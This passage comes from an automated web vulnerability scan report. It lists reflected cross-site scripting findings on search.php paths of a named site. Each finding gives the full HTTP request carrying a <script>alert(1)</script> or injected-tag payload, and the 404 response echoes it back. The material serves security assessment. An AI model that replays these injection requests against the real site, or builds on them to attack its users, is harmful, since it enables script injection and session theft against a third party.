The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 50add<script>alert(1)</script>5a729f10637 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes50add<script>alert(1)</script>5a729f10637/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes50add<script>alert(1)</script>5a729f10637/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3525. http://www.resellerbase.com/detail/6/themes/kosmos/images/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f076f<script>alert(1)</script>405924a4d17 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/kosmosf076f<script>alert(1)</script>405924a4d17/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmosf076f<script>alert(1)</script>405924a4d17/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3526. http://www.resellerbase.com/detail/6/themes/kosmos/images/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 4ad4f<script>alert(1)</script>9248a6370f5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/kosmos/images4ad4f<script>alert(1)</script>9248a6370f5/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/images4ad4f<script>alert(1)</script>9248a6370f5/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3527. http://www.resellerbase.com/detail/6/themes/kosmos/images/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 2114f<script>alert(1)</script>243f5baa39a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/kosmos/images/search.php2114f<script>alert(1)</script>243f5baa39a?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/images/search.php2114f<script>alert(1)</script>243f5baa39a?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3528. http://www.resellerbase.com/detail/6/themes/kosmos/images/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload cd5d1<a>0dd1bbc0ca0 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/6/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchcd5d1<a>0dd1bbc0ca0&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchcd5d1<a>0dd1bbc0ca0&opt=2 was not found on this server.</p>
...[SNIP]...

2.3529. http://www.resellerbase.com/detail/6/themes/kosmos/images/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 48c52<a>e3150b29fbb was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/6/themes/kosmos/images/search.php?keyword=search...48c52<a>e3150b29fbb&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/images/search.php?keyword=search...48c52<a>e3150b29fbb&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3530. http://www.resellerbase.com/detail/6/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7a472<script>alert(1)</script>abf4c759c58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&7a472<script>alert(1)</script>abf4c759c58=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&7a472<script>alert(1)</script>abf4c759c58=1 was not found on this server.</p>
...[SNIP]...

2.3531. http://www.resellerbase.com/detail/6/themes/kosmos/images/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload fa094<a>f27c146e830 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/6/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2fa094<a>f27c146e830 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2fa094<a>f27c146e830 was not found on this server.</p>
...[SNIP]...

2.3532. http://www.resellerbase.com/detail/6/themes/kosmos/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 73a0b<script>alert(1)</script>2d954f49cd8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail73a0b<script>alert(1)</script>2d954f49cd8/6/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail73a0b<script>alert(1)</script>2d954f49cd8/6/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3533. http://www.resellerbase.com/detail/6/themes/kosmos/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cb60c<script>alert(1)</script>dba326aff6f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6cb60c<script>alert(1)</script>dba326aff6f/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6cb60c<script>alert(1)</script>dba326aff6f/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3534. http://www.resellerbase.com/detail/6/themes/kosmos/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c24b6<script>alert(1)</script>1d919bf4bb5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themesc24b6<script>alert(1)</script>1d919bf4bb5/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themesc24b6<script>alert(1)</script>1d919bf4bb5/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3535. http://www.resellerbase.com/detail/6/themes/kosmos/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 24780<script>alert(1)</script>365170f8020 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/kosmos24780<script>alert(1)</script>365170f8020/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos24780<script>alert(1)</script>365170f8020/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3536. http://www.resellerbase.com/detail/6/themes/kosmos/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 30aa0<script>alert(1)</script>17e494db8ea was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/kosmos/search.php30aa0<script>alert(1)</script>17e494db8ea?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/search.php30aa0<script>alert(1)</script>17e494db8ea?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3537. http://www.resellerbase.com/detail/6/themes/kosmos/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 1b28c<a>693fb226258 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/6/themes/kosmos/search.php?keyword=search...&Submit3=Search1b28c<a>693fb226258&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/search.php?keyword=search...&Submit3=Search1b28c<a>693fb226258&opt=2 was not found on this server.</p>
...[SNIP]...

2.3538. http://www.resellerbase.com/detail/6/themes/kosmos/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 1b71d<a>62ef27d1f27 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/6/themes/kosmos/search.php?keyword=search...1b71d<a>62ef27d1f27&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/search.php?keyword=search...1b71d<a>62ef27d1f27&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3539. http://www.resellerbase.com/detail/6/themes/kosmos/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b1693<script>alert(1)</script>6fb8cee8239 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&b1693<script>alert(1)</script>6fb8cee8239=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&b1693<script>alert(1)</script>6fb8cee8239=1 was not found on this server.</p>
...[SNIP]...

2.3540. http://www.resellerbase.com/detail/6/themes/kosmos/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 14921<a>32ef0ff3837 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/6/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=214921<a>32ef0ff3837 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=214921<a>32ef0ff3837 was not found on this server.</p>
...[SNIP]...

2.3541. http://www.resellerbase.com/detail/6/themes/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f0554<script>alert(1)</script>a26902eafb8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailf0554<script>alert(1)</script>a26902eafb8/6/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailf0554<script>alert(1)</script>a26902eafb8/6/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
